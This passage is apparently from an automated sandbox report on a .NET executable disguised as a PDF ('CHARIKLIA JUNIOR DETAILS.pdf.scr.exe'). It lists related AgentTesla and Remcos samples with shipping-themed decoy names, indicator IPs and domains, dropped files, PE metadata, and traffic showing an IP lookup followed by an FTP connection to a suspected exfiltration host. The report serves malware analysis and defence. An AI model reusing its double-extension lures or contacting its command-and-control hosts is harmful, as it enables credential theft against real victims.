                                        Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                                        • api.ipify.org/
                                        6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                                        • api.ipify.org/
                                        perfcc.elfGet hashmaliciousXmrigBrowse
                                        • api.ipify.org/
                                        SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                                        • api.ipify.org/
                                        SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                                        • api.ipify.org/
                                        hloRQZmlfg.exeGet hashmaliciousRDPWrap ToolBrowse
                                        • api.ipify.org/
                                        file.exeGet hashmaliciousRDPWrap ToolBrowse
                                        • api.ipify.org/
                                        file.exeGet hashmaliciousUnknownBrowse
                                        • api.ipify.org/
                                        file.exeGet hashmaliciousUnknownBrowse
                                        • api.ipify.org/
                                        50.87.144.157PEACE SHIP PARTICULARS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                          ZHENGHE 3_Q88 20241118.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            01. MT JS JIANGYIN Ship Particulars.xlsx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              ESTEEM ASTRO PARTICULARS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                Q88.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  TROODOS AIR PARTICULARS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    COSCO SHIPPING WISDOM VESSEL DETAILS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      EVER ABILITY V66 PARTICULARS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        MV. NORDRHONE VSL's PARTICULARS.xlsx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                          MUM - VESSEL'S PARTICULARS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            beirutrest.comPEACE SHIP PARTICULARS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            • 50.87.144.157
                                                            ZHENGHE 3_Q88 20241118.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            • 50.87.144.157
                                                            01. MT JS JIANGYIN Ship Particulars.xlsx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            • 50.87.144.157
                                                            ESTEEM ASTRO PARTICULARS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            • 50.87.144.157
                                                            Q88.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            • 50.87.144.157
                                                            TROODOS AIR PARTICULARS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            • 50.87.144.157
                                                            COSCO SHIPPING WISDOM VESSEL DETAILS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            • 50.87.144.157
                                                            EVER ABILITY V66 PARTICULARS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            • 50.87.144.157
                                                            MV. NORDRHONE VSL's PARTICULARS.xlsx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            • 50.87.144.157
                                                            MUM - VESSEL'S PARTICULARS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            • 50.87.144.157
                                                            api.ipify.org+11375 Caller left Vc MsG 8b1538917f01661e6746a0528d545dbeac3b40a5- 73945.msgGet hashmaliciousHtmlDropperBrowse
                                                            • 104.26.12.205
                                                            DATASHEET.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 172.67.74.152
                                                            datasheet.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 104.26.13.205
                                                            datasheet.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 104.26.13.205
                                                            https://www.canva.com/design/DAGXCpgrUrs/iMtluWgvWDmsrSdUOsij5Q/view?utm_content=DAGXCpgrUrs&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                            • 104.26.12.205
                                                            https://pub-a652f10bc7cf485fb3baac4a6358c931.r2.dev/dreyflex.htmlGet hashmaliciousGabagoolBrowse
                                                            • 104.26.12.205
                                                            https://url.us.m.mimecastprotect.com/s/cx8GCJ6Aj8C8mZ33UVfXHy0nVz?domain=canva.comGet hashmaliciousUnknownBrowse
                                                            • 104.26.12.205
                                                            IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                            • 172.67.74.152
                                                            order and drawings_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 104.26.12.205
                                                            vessel details_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 104.26.12.205

                                                            ASNs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            CLOUDFLARENETUSwE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                                                            • 172.64.41.3
                                                            New_Order_PO-NG57283H9.exeGet hashmaliciousMassLogger RATBrowse
                                                            • 188.114.96.3
                                                            https://url.uk.m.mimecastprotect.com/s/1u4eCqxlyukZk7ltZfxHE-ELz?domain=andy-25.simvoly.comGet hashmaliciousHTMLPhisherBrowse
                                                            • 104.17.25.14
                                                            MDE_File_Sample_37ce4d95fd579c36340b1d1490e2ef7623af4bb3.zipGet hashmaliciousLummaCBrowse
                                                            • 188.114.96.3
                                                            http://newvideozones.clickGet hashmaliciousUnknownBrowse
                                                            • 188.114.96.3
                                                            file.exeGet hashmaliciousLummaCBrowse
                                                            • 188.114.96.3
                                                            file.exeGet hashmaliciousLummaCBrowse
                                                            • 188.114.97.3
                                                            Order requirements CIF Greece_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 188.114.96.3
                                                            z1MB267382625AE.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 188.114.97.3
                                                            96c27caf-3816-d26f-4af5-19e1d76e6c15.emlGet hashmaliciousHTMLPhisherBrowse
                                                            • 1.1.1.1
                                                            UNIFIEDLAYER-AS-1USSecured Audlo_secpod.com_1524702658.htmlGet hashmaliciousUnknownBrowse
                                                            • 69.49.245.172
                                                            https://floreslaherradura.com/?uid=a2FuZGVyc29uQGJxbGF3LmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                            • 192.185.3.195
                                                            https://1.midlifemouse.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVFXRTNlSFU9JnVpZD1VU0VSMTIxMTIwMjRVNTUxMTEyMjQ=N0123Nexample@email.comGet hashmaliciousUnknownBrowse
                                                            • 67.20.112.200
                                                            https://lmmoye.org/file/oL/xzw/Get hashmaliciousUnknownBrowse
                                                            • 69.49.234.173
                                                            USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                            • 216.172.172.178
                                                            Delivery_Notification_000275578.doc.jsGet hashmaliciousUnknownBrowse
                                                            • 162.241.225.96
                                                            USD470900_COPY_800BLHSBC882001.PDF.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                            • 216.172.172.178
                                                            New Order - RCII900718_Contract Drafting.exeGet hashmaliciousFormBookBrowse
                                                            • 108.179.253.197
                                                            arm7.nn-20241120-0508.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 162.144.165.86
                                                            http://www.dvdcollections.co.uk/search/redirect.php?deeplink=https://lp-engenharia.com/zerooo/?email=mwright@burbankca.govGet hashmaliciousHTMLPhisherBrowse
                                                            • 50.116.87.139

                                                            JA3 Fingerprints

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            3b5074b1b5d032e5620f69f9f700ff0eWire slip account payable.pif.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 104.26.12.205
                                                            file.exeGet hashmaliciousLummaCBrowse
                                                            • 104.26.12.205
                                                            Order requirements CIF Greece_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • 104.26.12.205
                                                            https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.comGet hashmaliciousUnknownBrowse
                                                            • 104.26.12.205
                                                            DATASHEET.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 104.26.12.205
                                                            datasheet.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 104.26.12.205
                                                            datasheet.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 104.26.12.205
                                                            ORDER 20240986 OA.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                            • 104.26.12.205
                                                            PO#8329837372938383839238PDF.exeGet hashmaliciousXWormBrowse
                                                            • 104.26.12.205
                                                            file.exeGet hashmaliciousLummaCBrowse
                                                            • 104.26.12.205

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1216
                                                            Entropy (8bit):5.34331486778365
                                                            Encrypted:false
                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                            Malicious:true
                                                            Reputation:high, very likely benign file
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):1172
                                                            Entropy (8bit):5.3550249375369265
                                                            Encrypted:false
                                                            SSDEEP:24:3OWSKco4KmZjKbmOIKod6emZ9tYs4RPQoUEJ0gt/NKIl9iagu:eWSU4xympjmZ9tz4RIoUl8NDv
                                                            MD5:D66C47B8DC1712C9019C2CA1A29A7224
                                                            SHA1:027D8E43DB55EB21BE139D06CCAD686648485565
                                                            SHA-256:217A7B18569319440E4C429C91D9ECD917765DF0037D0CD19E3072BE7126BC38
                                                            SHA-512:B2121B19348C8DD0204496EDA12D3416BE199284A307A13FEC0A7FD8FFD0F89511B9C110AE369049951ED27DD59E892153FE5E63600C3E7315A598DB5BB21F31
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:@...e................................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cwsuu0sb.sq3.ps1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Reputation:high, very likely benign file
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gqultexp.2j3.psm1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Reputation:high, very likely benign file
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hqsknafn.34x.psm1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vrbdbnsw.yx3.ps1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):7.526744624549009
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Windows Screen Saver (13104/52) 0.07%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            File name:CHARIKLIA JUNIOR DETAILS.pdf.scr.exe
                                                            File size:979'456 bytes
                                                            MD5:56507d8fc1346411ed4fdbecb4589ec8
                                                            SHA1:a7d542484247819e9037cbd913b8ad1b68b0dad6
                                                            SHA256:ad3517d5640b93e40bc1e839f6616222801d06dd83ed5887462a71f3858f5b40
                                                            SHA512:c31e23a032d3551bb17a5bbfdff585ec57f308397739b807c08b082513d63c1984d8cf0a4cd65c2f0863e6ebec0766f161abe6a8860c65a1e44619097cb77e7b
                                                            SSDEEP:12288:9csCELA+12Hd5lpvS36pDfi/xN3xoAS4zxPVzxWWavQ8qiNRJEvhsEY72k2uDF+d:rzxdzxWpq8JE9ePD47tdTmTX
                                                            TLSH:A525B02077F89E67E27AA1F3EB84425097B6D141767BE39A4CC564CE26C27320783D27
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*.>g..............0......(........... ........@.. .......................`............@................................

                                                            File Icon

                                                            Icon Hash:130b253d1931012d

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x4ee6e6
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x673E9B2A [Thu Nov 21 02:30:02 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                            Entrypoint Preview

                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xee6940x4f.text
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xf00000x2588.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xf40000xc.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x20000xec6ec0xec800d16a37cb289f1e668a0c69ca5a2f8ee0False0.7367111109275899data7.528842413573355IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rsrc0xf00000x25880x260050038f86c56e4d33d10d5412d21b5c17False0.8748972039473685data7.577073429096482IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0xf40000xc0x2004c41e5d352a398611a9e058992080527False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_ICON0xf01000x2016PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9504504504504504
                                                            RT_GROUP_ICON0xf21280x14data1.05
                                                            RT_VERSION0xf214c0x23cdata0.47027972027972026
                                                            RT_MANIFEST0xf23980x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                            Imports

                                                            DLLImport
                                                            mscoree.dll_CorExeMain

                                                            Network Behavior

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 21, 2024 11:51:06.184916019 CET49709443192.168.2.8104.26.12.205
                                                            Nov 21, 2024 11:51:06.184954882 CET44349709104.26.12.205192.168.2.8
                                                            Nov 21, 2024 11:51:06.185022116 CET49709443192.168.2.8104.26.12.205
                                                            Nov 21, 2024 11:51:06.194443941 CET49709443192.168.2.8104.26.12.205
                                                            Nov 21, 2024 11:51:06.194474936 CET44349709104.26.12.205192.168.2.8
                                                            Nov 21, 2024 11:51:07.456192970 CET44349709104.26.12.205192.168.2.8
                                                            Nov 21, 2024 11:51:07.456265926 CET49709443192.168.2.8104.26.12.205
                                                            Nov 21, 2024 11:51:07.458792925 CET49709443192.168.2.8104.26.12.205
                                                            Nov 21, 2024 11:51:07.458798885 CET44349709104.26.12.205192.168.2.8
                                                            Nov 21, 2024 11:51:07.459073067 CET44349709104.26.12.205192.168.2.8
                                                            Nov 21, 2024 11:51:07.510687113 CET49709443192.168.2.8104.26.12.205
                                                            Nov 21, 2024 11:51:07.521538973 CET49709443192.168.2.8104.26.12.205
                                                            Nov 21, 2024 11:51:07.563329935 CET44349709104.26.12.205192.168.2.8
                                                            Nov 21, 2024 11:51:07.904660940 CET44349709104.26.12.205192.168.2.8
                                                            Nov 21, 2024 11:51:07.904746056 CET44349709104.26.12.205192.168.2.8
                                                            Nov 21, 2024 11:51:07.904884100 CET49709443192.168.2.8104.26.12.205
                                                            Nov 21, 2024 11:51:07.910940886 CET49709443192.168.2.8104.26.12.205
                                                            Nov 21, 2024 11:51:09.581499100 CET4971121192.168.2.850.87.144.157
                                                            Nov 21, 2024 11:51:09.701241970 CET214971150.87.144.157192.168.2.8
                                                            Nov 21, 2024 11:51:09.701442957 CET4971121192.168.2.850.87.144.157
                                                            Nov 21, 2024 11:51:09.707833052 CET4971121192.168.2.850.87.144.157
                                                            Nov 21, 2024 11:51:09.827406883 CET214971150.87.144.157192.168.2.8
                                                            Nov 21, 2024 11:51:09.827860117 CET4971121192.168.2.850.87.144.157

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 21, 2024 11:51:05.948193073 CET6435153192.168.2.81.1.1.1
                                                            Nov 21, 2024 11:51:06.178083897 CET53643511.1.1.1192.168.2.8
                                                            Nov 21, 2024 11:51:09.058645010 CET6499353192.168.2.81.1.1.1
                                                            Nov 21, 2024 11:51:09.579471111 CET53649931.1.1.1192.168.2.8

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Nov 21, 2024 11:51:05.948193073 CET192.168.2.81.1.1.10x76a2Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                            Nov 21, 2024 11:51:09.058645010 CET192.168.2.81.1.1.10x4be9Standard query (0)beirutrest.comA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Nov 21, 2024 11:51:06.178083897 CET1.1.1.1192.168.2.80x76a2No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                            Nov 21, 2024 11:51:06.178083897 CET1.1.1.1192.168.2.80x76a2No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                            Nov 21, 2024 11:51:06.178083897 CET1.1.1.1192.168.2.80x76a2No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                            Nov 21, 2024 11:51:09.579471111 CET1.1.1.1192.168.2.80x4be9No error (0)beirutrest.com50.87.144.157A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • api.ipify.org

                                                            HTTPS Proxied Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.849709104.26.12.2054437684C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-11-21 10:51:07 UTC155OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                            Host: api.ipify.org
                                                            Connection: Keep-Alive
                                                            2024-11-21 10:51:07 UTC399INHTTP/1.1 200 OK
                                                            Date: Thu, 21 Nov 2024 10:51:07 GMT
                                                            Content-Type: text/plain
                                                            Content-Length: 11
                                                            Connection: close
                                                            Vary: Origin
                                                            CF-Cache-Status: DYNAMIC
                                                            Server: cloudflare
                                                            CF-RAY: 8e601f6d4ff019ae-EWR
